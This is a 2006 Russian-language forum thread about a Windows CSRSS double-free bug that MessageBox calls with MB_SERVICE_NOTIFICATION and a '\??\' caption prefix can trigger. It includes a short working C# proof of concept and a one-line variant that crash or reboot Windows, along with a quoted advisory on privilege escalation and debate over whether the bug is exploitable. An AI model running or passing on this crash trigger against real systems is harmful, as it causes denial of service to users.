Re[2]: Убийственный MessageBox от Microsoft
От: Pavel Dvorkin Россия  
Дата: 20.12.06 12:40
Оценка: :)
Здравствуйте, Ubivetz, Вы писали:

U>Всё это приближает знаменательное событие "Вендекапец", которое так долго ждали на ЛОРе

Слухи о моей смерти оказались явно преждевременными (C) Марк Твен
With best regards
Pavel Dvorkin
Re[3]: Убийственный MessageBox от Microsoft
От: Димчанский Литва http://dimchansky.github.io/
Дата: 20.12.06 12:47
Оценка: +2
Здравствуйте, Pavel Dvorkin, Вы писали:

PD>Слухи о моей смерти оказались явно преждевременными (C) Марк Твен

Слухи о моей смерти оказались несколько преувеличенными.
Re[2]: Убийственный MessageBox от Microsoft
От: Mazay Россия  
Дата: 20.12.06 14:46
Оценка:
Здравствуйте, Ubivetz, Вы писали:

U>Только что проверял: на самой последней аглицкой ХР (регулярно из инета обновляется) работает. Причём работает жёстко!
U>Где-то на 4-м MessageBox'е винда перегружается.
U>Ждём эксплоитов
U>

Да кому этот сплоит нужен? Если только из под ограниченых прав тачку ребутнуть.
Удивляет то, что столь долго и интенсивно испольуемый код содержит такие баги.
Главное гармония ...
Re[9]: Убийственный MessageBox от Microsoft
От: jenyavb  
Дата: 22.12.06 08:54
Оценка:
Здравствуйте, Privalov, Вы писали:

P>Здравствуйте, _alm_, Вы писали:

__>>Ммм... Рубильник на силовом щите ?

P>Что, нажать? Или ударить чем? А обойдусь ли без посторонней помощи?

Кувалдой его! (комп)
... << RSDN@Home 1.1.4 stable SR1 rev. 568>>
Re: Убийственный MessageBox от Microsoft
От: HoseCo  
Дата: 22.12.06 09:46
Оценка:
Здравствуйте, Димчанский, Вы писали:

Д>здесь все подробности.
Д>Если у кого-то нету под рукой C++ компилятора, то вот порт под .NET Framework:
Д>
// mbox.cs
Д>using System;
Д>using System.Runtime.InteropServices;
Д>class HelloWorldFromMicrosoft
Д>{
Д>  [DllImport("user32.dll")]
Д>  unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType);
  
Д>  static unsafe void Main()
Д>  {
Д>    byte[] helloBug = new byte[] {0x5C, 0x3F, 0x3F, 0x5C, 0x21, 0x21, 0x21, 0x00};
Д>    uint MB_SERVICE_NOTIFICATION = 0x00200000u; 
Д>    fixed(byte* pHelloBug = &helloBug[0])
Д>    {
Д>      for(int i=0; i<10; i++)
Д>        MessageBoxA(0u, pHelloBug, pHelloBug, MB_SERVICE_NOTIFICATION);
Д>    }
Д>  }
Д>}

Д>Компилим и запускаем:
Д>

>> C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\csc.exe /unsafe mbox.cs
>>> mbox.exe

 Д>После 2-4 итерации Windows начинает, как правило, загибаться.
Д>На Vista может кто-то проверить?

на шарпе попробовал. Вот такой месадж бокс с 4го раза перезагрузил комп:
MessageBox.Show("\\??\\C:\\", "\\??\\C:\\", MessageBoxButtons.OK, MessageBoxIcon.Asterisk, MessageBoxDefaultButton.Button1, MessageBoxOptions.ServiceNotification);

веселая игрушка
... << RSDN@Home 1.1.4 stable SR1 rev. 568>>
Re[3]: Убийственный MessageBox от Microsoft
От: mike_rs Россия  
Дата: 22.12.06 13:44
Оценка:
Здравствуйте, Mazay, Вы писали:

M>Да кому этот сплоит нужен? Если только из под ограниченых прав тачку ребутнуть.
M>Удивляет то, что столь долго и интенсивно испольуемый код содержит такие баги.


http://www.determina.com/security.research/vulnerabilities/csrss-harderror.html

This vulnerability allows a logged on user to execute arbitrary code in the CSRSS.EXE process and elevate their privileges to SYSTEM level. The vulnerable code is present in Windows 2000, XP, 2003 and Vista.

так что не просто ребутнуть. А для "мега-защищенной" висты это просто ппц.
Re: Убийственный MessageBox от Microsoft
От: Delphi_coder  
Дата: 22.12.06 14:07
Оценка:
> На Vista может кто-то проверить?

WinNT 4.0 — 10 итераций, полет нормальный?! Что не так?
Posted via RSDN NNTP Server 2.0
Re[2]: Убийственный MessageBox от Microsoft
От: Great_Vova  
Дата: 22.12.06 14:11
Оценка:
Здравствуйте, Delphi_coder, Вы писали:

D_>WinNT 4.0 — 10 итераций, полет нормальный?! Что не так?

Попробуй больше итераций. У нас одна машина с Win2k свалилась только после >20 итераций
Re: Убийственный MessageBox от Microsoft
От: Ubivetz Украина  
Дата: 22.12.06 14:24
Оценка:
Здравствуйте, Димчанский, Вы писали:

Д>На Vista может кто-то проверить?

Улыбнуло:

север
65 — 22.12.2006 — 08:07 Хех. Дырка дошла до Determina. Они покопались и сказали, что "This vulnerability allows a logged on user to ехесute arbitrary code in the CSRSS.EXE process and elevate their privileges to SYSTEM level."
Так что NULL нашел способ, как в Vista повысить свои привелегии до SYSTEM. Лишил девственности так сказать ...
http://www.determina.com/security.research/vulnerabilities/csrss-harderror.html
север
66 — 22.12.2006 — 12:59 Пошло поехало. Уже эксплоиты видели. Теперь они попадут в свежие вирусы и трояны для повышения прав до системных после заражения пользователя.
.
Так что NULL, если ты мечтал когда-нибудь написать код, который бы получил широкую известность и большое распространение, можешь ставить галочку. Твоя находка будет использоваться и работать на миллионах компьютеров по всему миру

Эх, люблю выпить и переспать с кем нибудь!
Но чаще выходит перепить с кем — нибудь и выспаться...
Re[9]: Убийственный MessageBox от Microsoft
От: metalim Эстония http://mem.ee
Дата: 22.12.06 15:46
Оценка:
Здравствуйте, Privalov, Вы писали:

__>>Ммм... Рубильник на силовом щите ?
P>Что, нажать? Или ударить чем? А обойдусь ли без посторонней помощи?

Без медицинской помощи потом точно не обойдёшься.
Have fun: Win+M, Ctrl+A, Enter
Re[4]: Убийственный MessageBox от Microsoft
От: Mazay Россия  
Дата: 22.12.06 15:48
Оценка:
Здравствуйте, mike_rs, Вы писали:

M>>Да кому этот сплоит нужен? Если только из под ограниченых прав тачку ребутнуть.
M>>Удивляет то, что столь долго и интенсивно испольуемый код содержит такие баги.

_>http://www.determina.com/security.research/vulnerabilities/csrss-harderror.html

_>This vulnerability allows a logged on user to execute arbitrary code in the CSRSS.EXE process and elevate their privileges to SYSTEM level. The vulnerable code is present in Windows 2000, XP, 2003 and Vista.

_>так что не просто ребутнуть. А для "мега-защищенной" висты это просто ппц.

А ещё там написано:

Technical Details:

If the MB_SERVICE_NOTIFICATION flag is specified when calling the MessageBox function from the Windows API, it will use the NtRaiseHardError syscall to send a HardError message to CSRSS. This message contains the caption and text of a message box to be displayed by CSRSS on behalf of the caller. This functionality is designed to allow non-interactive services to notify the user of critical errors.

The HardError message is handled by the UserHardError function in WINSRV.DLL. It calls GetHardErrorText to read the message parameters from the address space of the sender. The GetHardErrorText function returns pointers to the caption and text of the message box. If the caption or text parameters start with the \??\ prefix, the function inexplicably frees the buffer and returns a pointer to freed memory. After the message box is closed by the user, the same buffer is freed again in the FreePhi function, resulting in a double free vulnerability.


Не представляю, как это можно использовать для выполнения кода. ИМХО вероятность не больше чем получить шелл-код генератором случайных чисел. Если б в этот буфер кто-нибудь потом писал, а так — ну попытается какая-нибудь функция считать строку из мусорного указателя и чё?
Главное гармония ...
Re[4]: Убийственный MessageBox от Microsoft
От: Dmitry Kotlyarov Россия  
Дата: 25.12.06 13:37
Оценка:
Здравствуйте, Димчанский, Вы писали:

G>>Под дельфями все работает нормально. В смысле что баг не проявился.

Д>Это скорее всего потому, что Делфи вызывают юникод версию MessageBoxW.


Неправда. MessageBoxA реализован через MessageBoxW, как и все аналогичные ANSI-версии функций Windows API (см. Рихтера и т.п.).